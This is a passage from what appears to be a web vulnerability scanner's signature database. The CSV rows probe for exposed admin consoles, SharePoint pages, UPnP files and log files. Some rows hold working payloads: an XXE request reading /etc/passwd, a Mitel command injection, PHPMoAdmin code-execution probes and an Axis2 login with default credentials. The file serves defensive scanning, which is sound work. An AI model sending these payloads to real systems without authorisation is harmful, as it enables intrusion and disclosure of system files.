available.\",\"\",\"\"\n\"006879\",\"0\",\"b1\",\"/_vti_bin/_vti_aut/WS_FTP.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006880\",\"0\",\"b1\",\"/_vti_bin/_vti_aut/ws_ftp.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006881\",\"0\",\"b1\",\"/_vti_bin/_vti_aut/author.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006882\",\"0\",\"b1\",\"/_layouts/addrole.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006883\",\"0\",\"b1\",\"/_layouts/AdminRecycleBin.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006884\",\"0\",\"b1\",\"/_layouts/AreaNavigationSettings.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006885\",\"0\",\"b1\",\"/_Layouts/AreaTemplateSettings.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006886\",\"0\",\"b1\",\"/_Layouts/AreaWelcomePage.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006887\",\"0\",\"b1\",\"/_layouts/bpcf.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006888\",\"0\",\"b1\",\"/_Layouts/ChangeSiteMasterPage.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006889\",\"0\",\"b1\",\"/_layouts/create.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006890\",\"0\",\"b1\",\"/_layouts/editgrp.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006891\",\"0\",\"b1\",\"/_layouts/editprms.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006892\",\"0\",\"b1\",\"/_layouts/help.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006893\",\"0\",\"b1\",\"/_layouts/images/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006894\",\"0\",\"b1\",\"/_layouts/listedit.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006895\",\"0\",\"b1\",\"/_layouts/ManageFeatures.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006897\",\"0\",\"b1\",\"/_layouts/mcontent.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006898\",\"0\",\"b1\",\"/_layouts/mngctype.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006899\",\"0\",\"b1\",\"/_layouts/mngfield.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006900\",\"0\",\"b1\",\"/_layouts/mngsiteadmin.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006901\",\"0\",\"b1\",\"/_layouts/mngsubwebs.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006902\",\"0\",\"b1\",\"/_layouts/mngsubwebs.aspx?view=sites\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006903\",\"0\",\"b1\",\"/_layouts/mobile/mbllists.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006904\",\"0\",\"b1\",\"/_layouts/MyInfo.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006905\",\"0\",\"b1\",\"/_layouts/MyPage.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006906\",\"0\",\"b1\",\"/_layouts/MyTasks.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006907\",\"0\",\"b1\",\"/_layouts/navoptions.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006908\",\"0\",\"b1\",\"/_layouts/NewDwp.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006909\",\"0\",\"b1\",\"/_layouts/newgrp.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006910\",\"0\",\"b1\",\"/_layouts/newsbweb.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006912\",\"0\",\"b1\",\"/_layouts/PageSettings.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006913\",\"0\",\"b1\",\"/_layouts/people.aspx?MembershipGroupId=0\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006914\",\"0\",\"b1\",\"/_layouts/permsetup.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006915\",\"0\",\"b1\",\"/_layouts/picker.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006916\",\"0\",\"b1\",\"/_layouts/policy.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006917\",\"0\",\"b1\",\"/_layouts/policyconfig.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006918\",\"0\",\"b1\",\"/_layouts/policycts.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006919\",\"0\",\"b1\",\"/_layouts/Policylist.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006920\",\"0\",\"b1\",\"/_layouts/prjsetng.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006921\",\"0\",\"b1\",\"/_layouts/quiklnch.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006922\",\"0\",\"b1\",\"/_layouts/recyclebin.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006923\",\"0\",\"b1\",\"/_Layouts/RedirectPage.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006924\",\"0\",\"b1\",\"/_layouts/role.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006925\",\"0\",\"b1\",\"/_layouts/settings.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006926\",\"0\",\"b1\",\"/_layouts/SiteDirectorySettings.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006927\",\"0\",\"b1\",\"/_layouts/sitemanager.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006928\",\"0\",\"b1\",\"/_layouts/SiteManager.aspx?lro=all\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006929\",\"0\",\"b1\",\"/_layouts/spcf.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006930\",\"0\",\"b1\",\"/_layouts/storman.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006931\",\"0\",\"b1\",\"/_layouts/themeweb.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006932\",\"0\",\"b1\",\"/_layouts/topnav.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006933\",\"0\",\"b1\",\"/_layouts/user.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006934\",\"0\",\"b1\",\"/_layouts/userdisp.aspx?ID=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006935\",\"0\",\"b1\",\"/_layouts/useredit.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006936\",\"0\",\"b1\",\"/_layouts/useredit.aspx?ID=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006937\",\"0\",\"b1\",\"/_layouts/viewlsts.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006938\",\"0\",\"b1\",\"/_layouts/vsubwebs.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006939\",\"0\",\"b1\",\"/_layouts/WPPrevw.aspx?ID=247\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006940\",\"0\",\"b1\",\"/_layouts/wrkmng.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006941\",\"0\",\"b1\",\"/Forms/DispForm.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006942\",\"0\",\"b1\",\"/Forms/DispForm.aspx?ID=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006943\",\"0\",\"b1\",\"/Forms/EditForm.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006944\",\"0\",\"b1\",\"/Forms/EditForm.aspx?ID=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006945\",\"0\",\"b1\",\"/Forms/Forms/AllItems.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006946\",\"0\",\"b1\",\"/Forms/MyItems.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006947\",\"0\",\"b1\",\"/Forms/NewForm.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006948\",\"0\",\"b1\",\"/Pages/default.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006949\",\"0\",\"b1\",\"/Pages/Forms/AllItems.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006950\",\"0\",\"b1\",\"/_catalogs/masterpage/Forms/AllItems.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006951\",\"0\",\"b1\",\"/_catalogs/wp/Forms/AllItems.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006952\",\"0\",\"b1\",\"/_catalogs/wt/Forms/Common.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006953\",\"0\",\"b1\",\"/_vti_pvt/service.grp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006954\",\"0\",\"b1\",\"/_vti_pvt/botsinf.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006955\",\"0\",\"b1\",\"/_vti_pvt/structure.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006956\",\"0\",\"b1\",\"/_vti_pvt/uniqperm.cnf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"FrontPage/Sharepointfile available.\",\"\",\"\"\n\"006957\",\"0\",\"0\",\"/Editor/assetmanager/assetmanager.php\",\"GET\",\"Upload\\sFile\",\"\",\"\",\"\",\"\",\"InnovaStudio file uploader found\",\"\",\"\"\n\"006958\",\"0\",\"23\",\"/Glimpse.axd\",\"GET\",\"Standard\\sSettings\",\"\",\"\",\"\",\"\",\"Glimpse debug program found\",\"\",\"\"\n\"006959\",\"0\",\"3\",\"/edevicedesc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006960\",\"0\",\"3\",\"/bmlinks/ddf.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006961\",\"0\",\"3\",\"/configd.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006962\",\"0\",\"3\",\"/description.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006963\",\"0\",\"3\",\"/DeviceDescription.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006964\",\"0\",\"3\",\"/etc/linuxigd/gatedesc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006965\",\"0\",\"3\",\"/igddesc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006966\",\"0\",\"3\",\"/IPCamDesc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006967\",\"0\",\"3\",\"/MediaServerDevDesc.xml \",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006968\",\"0\",\"3\",\"/mini.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006969\",\"0\",\"3\",\"/NasDevice.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006970\",\"0\",\"3\",\"/nasService.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006971\",\"0\",\"3\",\"/PrintBasicDevice.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006972\",\"0\",\"3\",\"/Public_UPNP_gatedesc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006973\",\"0\",\"3\",\"/rootDesc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006974\",\"0\",\"3\",\"/rss/Starter_desc.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006975\",\"0\",\"3\",\"/simplecfg.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006976\",\"0\",\"3\",\"/tr064dev.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006977\",\"0\",\"3\",\"/upnp/IGD.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006978\",\"0\",\"3\",\"/upnp/printer/ddf.xml\",\"GET\",\"<root\",\"\",\"upnp-org\",\"\",\"\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006979\",\"0\",\"d\",\"/apidocs/\",\"GET\",\"API\\sDoc\",\"\",\"\",\"\",\"\",\"Possible API documentation available.\",\"\",\"\"\n\"006980\",\"0\",\"3\",\"/ipn_log.txt\",\"GET\",\"payer_email\",\"\",\"\",\"\",\"\",\"PayPal log file found and may contain sensitive information.\",\"\",\"\"\n\"006981\",\"0\",\"3\",\"/paypal/ipn_log.txt\",\"GET\",\"payer_email\",\"\",\"\",\"\",\"\",\"PayPal log file found and may contain sensitive information.\",\"\",\"\"\n\"006983\",\"0\",\"3\",\"/psystems/paypal/ipn_log.txt\",\"GET\",\"payer_email\",\"\",\"\",\"\",\"\",\"PayPal log file found and may contain sensitive information.\",\"\",\"\"\n\"006984\",\"0\",\"3be\",\"/_profiler/\",\"GET\",\"symfony\",\"No\\sroute\",\"\",\"\",\"\",\"Symfony Profiler may reveal sensitive application information.\",\"\",\"\"\n\"006985\",\"0\",\"3b\",\"/CSCOSSLC/config-auth\",\"GET\",\"<version who=[^>]+>.+<\\/version>\",\"\",\"\",\"\",\"\",\"Cisco ASA Web VPN may reval sensitive version info (CVE-2014-3398).\",\"\",\"\"\n\"006986\",\"0\",\"d\",\"@MAGENTOapi/soap/?wsdl=1\",\"GET\",\"<definitions xmlns:typens=\\\"urn:Magento\\\"\",\"\",\"\",\"\",\"\",\"Magento Shop WebService identified.\",\"\",\"\"\n\"006987\",\"0\",\"123b\",\"@MAGENTORELEASE_NOTES.txt\",\"GET\",\"==== ([0-9\\.]+) ====\",\"\",\"\",\"\",\"\",\"Magento Shop Changelog identified.\",\"\",\"\"\n\"006988\",\"0\",\"e\",\"@MAGENTOadmin/\",\"GET\",\"Magento\\sInc\",\"\",\"\",\"\",\"\",\"Magento Shop admin backend identified.\",\"\",\"\"\n\"006989\",\"0\",\"e\",\"@MAGENTOdownloader/\",\"GET\",\"Magento\\sConnect\\sManager\\sver\",\"\",\"\",\"\",\"\",\"Magento Connect Manager login identified. This might also reval the installed version of Magento\",\"\",\"\"\n\"006990\",\"0\",\"3b\",\"@AXIS2services/Version/getVersion\",\"GET\",\"Hello\\sI\\sam\\sAxis2\",\"Hi\\s-\\sthe\\sAxis2\\sversion\\sis\",\"\",\"\",\"\",\"Apache Axis2 version identified.\",\"\",\"\"\n\"006991\",\"0\",\"b\",\"@ADOBEXML\",\"GET\",\"<amfx ver=\",\"\",\"</amfx>\",\"\",\"\",\"Adobe BlazeDS identified.\",\"\",\"\"\n\"006992\",\"62292\",\"357\",\"@ADOBEXML\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Adobe BlazeDS is vulnerable to an XXE (CVE-2009-3960)\",\"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \\\"/etc/passwd\\\"> ]><amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\"><body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits/></object><null/><string/><string/><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&xxe;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\",\"Content-Length: 714\"\n\"006993\",\"11709\",\"3\",\"/index.JSP\",\"GET\",\"<\\%\",\"\",\"\\%>\",\"\",\"\",\"Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase .JSP extension instead of the lowercase .jsp extension. (CVE-2003-0411)\",\"\",\"\"\n\"006994\",\"69934\",\"8\",\"/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/etc/passwd%22%26\",\"GET\",\"root:x:0\",\"\",\"\",\"\",\"\",\"Mitel Audio and Web Conferencing (AWC) contains a command execution vulnerability.\",\"\",\"\"\n\"006995\",\"0\",\"b\",\"/portal/\",\"GET\",\"Mitel\\sNetworks\",\"\",\"\",\"\",\"\",\"Mitel Audio and Web Conferencing login found.\",\"\",\"\"\n\"006996\",\"0\",\"b\",\"/server-manager/\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Mitel Audio and Web Conferencing server manager identified.\",\"\",\"\"\n\"006997\",\"0\",\"b\",\"/awcuser/cgi-bin/vcs?xml=withXsl&xsl=/vcs/vcs_home.xsl&show_codes=&current_vanities=&settings=global%3buser%3bphone&show_port_res_settings\",\"GET\",\"Verify\\sClient\",\"\",\"\",\"\",\"\",\"Mitel Audio and Web Conferencing found.\",\"\",\"\"\n\"006998\",\"0\",\"e\",\"@JENKINSmanage\",\"GET\",\"Manage\\sJenkins\",\"Manage\\sHudson\",\"\",\"\",\"\",\"Jenkins/Hudson Management console accessible without authentication.\",\"\",\"\"\n\"006999\",\"0\",\"8\",\"@JENKINSscript\",\"GET\",\"Script\\sConsole\",\"\",\"Groovy\\sscript\",\"\",\"\",\"Jenkins/Hudson Groovy Script console accessible without authentication. This allows to execution of shell commands.\",\"\",\"\"\n\"007000\",\"0\",\"d\",\"@AXIS2services/listServices\",\"GET\",\"<title>List\\sServices\",\"\",\"\",\"\",\"\",\"Apache Axis2 WebServices identified.\",\"\",\"\"\n\"007001\",\"0\",\"b\",\"@AXIS2axis2-web/index.jsp\",\"GET\",\"<title>Axis\\s2\\s-\\sHome\",\"\",\"\",\"\",\"\",\"Apache Axis2 Web Application identified.\",\"\",\"\"\n\"007004\",\"68662\",\"b8e\",\"@AXIS2axis2-admin/login\",\"POST\",\"Welcome\\sto\\sAxis2\\sWeb\\sAdmin\\sModule\\s!!\",\"\",\"\",\"\",\"\",\"Apache Axis2 administration console with default credentials admin:axis2 found (CVE-2010-2103), see also http://www.rapid7.com/security-center/advisories/R7-0037.jsp\",\"userName=admin&password=axis2&submit=+Login+\",\"\"\n\"007006\",\"0\",\"be\",\"/adminer.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007007\",\"0\",\"b\",\"/404.php\",\"GET\",\"<input type=password name=pass>\",\"\",\"\",\"\",\"\",\"The 404.php backdoor program seems to be present. https://github.com/tennc/webshell/blob/master/php/404.php.txt\",\"\",\"\"\n\"007009\",\"0\",\"be\",\"@AXIS2Login.jsp\",\"GET\",\"Login\\sto\\sAxis2::\",\"\",\"\",\"\",\"\",\"Apache Axis2 administration console found.\",\"\",\"\"\n\"007010\",\"0\",\"8\",\"@MODIR@MOFILE\",\"POST\",\"uid=\",\"\",\"gid=\",\"\",\"\",\"PHPMoAdmin is vulnerable to a remote code execution (CVE-2015-2208).\",\"object=1;system('id');\",\"\"\n\"007011\",\"0\",\"8\",\"@MODIR@MOFILE?collection=secpulse&action=listRows&find=array();phpinfo();exit;\",\"GET\",\"<title>phpinfo\\(\\)\",\"\",\"\",\"\",\"\",\"PHPMoAdmin is vulnerable to a remote code execution (CVE-2015-2208).\",\"\",\"\"\n\"007012\",\"0\",\"be\",\"@MODIR@MOFILE\",\"GET\",\"<title>phpMoAdmin\",\"\",\"\",\"\",\"\",\"PHPMoAdmin identified.\",\"\",\"\"\n\"007013\",\"0\",\"be\",\"@RAINLOOP?admin\",\"GET\",\"RainLoop\\sTeam\",\"\",\"rainloopAppData\",\"\",\"\",\"RainLoop Webmail admin backend identified. Default credentials are admin:12345\",\"\",\"\"\n\"007014\",\"0\",\"b9\",\"@WORDPRESSwp-content/plugins/gravityforms/change_log.txt\",\"GET\",\"200\",\"\",\"\",\"1\\.9\\.3\\.6\",\"\",\"Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849\",\"\",\"\"\n\"007015\",\"0\",\"b\",\"@TOMCATADMINstatus\",\"GET\",\"<tt>conf\\/tomcat-users\\.xml<\\/tt>\",\"\",\"\",\"\",\"\",\"Default Tomcat Server Status interface found\",\"\",\"\"\n\"007016\",\"0\",\"b\",\"@TOMCATADMINstatus\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Tomcat Server Status interface found (pass protected)\",\"\",\"\"\n\"007017\",\"0\",\"be\",\"@TOMCATADMINlogin.jsp\",\"GET\",\"<title>Tomcat Server Administration\",\"\",\"\",\"\",\"\",\"Tomcat Server Administration interface found\",\"\",\"\"\n\"007018\",\"0\",\"b\",\"/server-status\",\"GET\",\"401\",\"403\",\"\",\"200\",\"\",\"Apache server-status interface found (protected/forbidden)\",\"\",\"\"\n\"007019\",\"0\",\"b\",\"/server-info\",\"GET\",\"401\",\"403\",\"\",\"200\",\"\",\"Apache server-info interface found (protected/forbidden)\",\"\",\"\"\n\"007020\",\"0\",\"b\",\"/README.mediawiki\",\"GET\",\"== MediaWiki ==\",\"\",\"\",\"\",\"\",\"Mediawiki README file found\",\"\",\"\"\n\"007021\",\"0\",\"123b\",\"@MANTISdoc/RELEASE\",\"GET\",\"MantisBT Release Notes\",\"(Maintenance|Stable|Security) Release\",\"\",\"\",\"\",\"Mantis Bugtracker Release Notes identified.\",\"\",\"\"\n\"007022\",\"0\",\"123b\",\"@DOKUWIKIVERSION\",\"GET\",\"[0-9]+\\-[0-9]+\\-[0-9]+[a-z]? \\\"[a-zA-Z].*\\\"\",\"\",\"\",\"\",\"\",\"Dokuwiki Version file identified.\",\"\",\"\"\n\"007023\",\"0\",\"e\",\"/solr/#/\",\"GET\",\"<span>Apache\\sSOLR\",\"\",\"\",\"\",\"\",\"Apache Solr console found\",\"\",\"\"\n\"007024\",\"0\",\"be\",\"/sixcms/admin/login/\",\"GET\",\"<title>SixCMS\",\"\",\"\",\"\",\"\",\"SixCMS Administration interface found\",\"\",\"\"\n\"007025\",\"0\",\"be\",\"@ROCKMONGOindex.php?action=login.index\",\"GET\",\"<title>RockMongo\",\"\",\"\",\"\",\"\",\"RockMongo MongoDB administration tool found. Default credentials are admin:admin.\",\"\",\"\"\n\"007026\",\"0\",\"be\",\"@ROCKMONGOindex.php?action=admin.index\",\"GET\",\"Command Line\",\"Build Information\",\"<title>RockMongo\",\"\",\"\",\"Unprotected RockMongo MongoDB administration tool found.\",\"\",\"\"\n\"007027\",\"0\",\"3\",\"/humans.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The humans.txt file may reveal information aboute site owners/developers. See http://humanstxt.org/ for info.\",\"\",\"\"\n\"007028\",\"0\",\"be\",\"/wba/home.html\",\"GET\",\"(LANSA\\sGroup|Arterial\\sSoftware)\",\"\",\"\",\"\",\"\",\"Lansa aXis administration console found.\",\"\",\"\"\n\"007029\",\"0\",\"be\",\"/axesde/\",\"GET\",\"LANSA\\sGroup\",\"\",\"\",\"\",\"\",\"Lansa aXis Data Explorer console found.\",\"\",\"\"\n\"007031\",\"0\",\"be\",\"/ts/skins/ts_basic.html?lang=en/\",\"GET\",\"aXes\\sTerminal\\sServer\",\"\",\"\",\"\",\"\",\"Lansa aXis terminal explorer found.\",\"\",\"\"\n\"007032\",\"0\",\"be\",\"/ts/dev/index.html?lang=en/\",\"GET\",\"aXes\\sTerminal\\sServer\",\"\",\"\",\"\",\"\",\"Lansa aXis terminal explorer found.\",\"\",\"\"\n\"007033\",\"0\",\"be\",\"/wba/browser_test.html\",\"GET\",\"aXes\\sBrowser\\sCompatibility\",\"\",\"\",\"\",\"\",\"Lansa aXes Browser 